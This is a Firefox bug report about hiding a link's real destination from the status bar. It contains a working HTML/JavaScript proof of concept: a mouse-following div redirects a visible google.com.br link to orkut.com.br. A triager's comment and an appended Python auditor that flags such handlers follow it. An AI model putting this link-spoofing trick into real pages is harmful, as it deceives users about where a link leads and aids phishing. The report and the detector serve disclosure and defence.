Closed
Bug 513808
Opened 15 years ago
Closed 14 years ago
One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Categories
(Firefox :: Page Info Window, defect)
RESOLVED
DUPLICATE
of bug 474967
People
(Reporter: vag_bracker, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: ALL

Look at this code, save it as .html and open it in the browser! ;)

<html>
<body>
<div id="mydiv" onmouseover="document.location='http://www.orkut.com.br';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=mouseX-1;
  document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Barra de Status Obfuscation / Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">☻</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br>
<br>
<a href="http://www.google.com.br" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Veja aqui...<br> | <br> V </font>
</div>
</body>
</html>

Try it and see! xD
If you disable JavaScript, it doesn't work!
Cheers

Reproducible: Always

Steps to Reproduce:
1. Write the code in JavaScript
2. Build a page using the method!
3. Have a party with fake pages!

Actual Results:
Maybe some who know about it are using it for personal ends!

I hope I have helped everyone with this, and that I have expressed myself correctly!
Cheers! And good luck! I accept job offers! ^^ I'm 15 years old!
Comment 1•15 years ago
This is not "clickjacking". This code obscures the destination of a link (there are many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link. I've seen this example elsewhere; this is a duplicate. (Also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
Comment 2•14 years ago
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Updated•14 years ago
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
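
A defensive audit for the pattern in the report and for the simpler onclick variant Comment 1 mentions, added here as an example and not code from the bug or from Mozilla: it flags inline event handlers that assign `location` to a host other than the `href` the status bar previews. The names `audit` and `HandlerAudit` and the `.example` hosts in the constructed sample are assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-handler navigation such as: document.location='http://host/'
NAV_RE = re.compile(
    r"(?:document|window|self|top)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)

class HandlerAudit(HTMLParser):
    """Record every inline on* handler that assigns a URL to location."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name: value or "" for name, value in attrs}
        # Host the status bar would preview; only anchors have one.
        href_host = urlparse(attrs.get("href", "")).hostname if tag == "a" else None
        for name, value in attrs.items():
            if not name.startswith("on"):
                continue
            for target in NAV_RE.findall(value):
                self.findings.append({
                    "tag": tag,
                    "handler": name,
                    "href_host": href_host,
                    "target_host": urlparse(target).hostname,
                })

def audit(html):
    """Return handlers that navigate to a host other than the previewed one."""
    parser = HandlerAudit()
    parser.feed(html)
    return [f for f in parser.findings
            if f["target_host"] and f["target_host"] != f["href_host"]]

# Constructed sample: the report's pattern with placeholder hosts.
SAMPLE = """
<div id="mydiv" onmouseover="document.location='http://other.example/';"></div>
<a href="http://shown.example/" onclick="updatebox(event)">http://shown.example/</a>
<a href="http://shown.example/" onclick="document.location='http://other.example/x'">link</a>
<a href="http://shown.example/a" onclick="window.location.href='http://shown.example/b'">ok</a>
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

This is a static check over inline attributes only; handlers attached from script, or navigation by other means such as redirects, are outside what it sees.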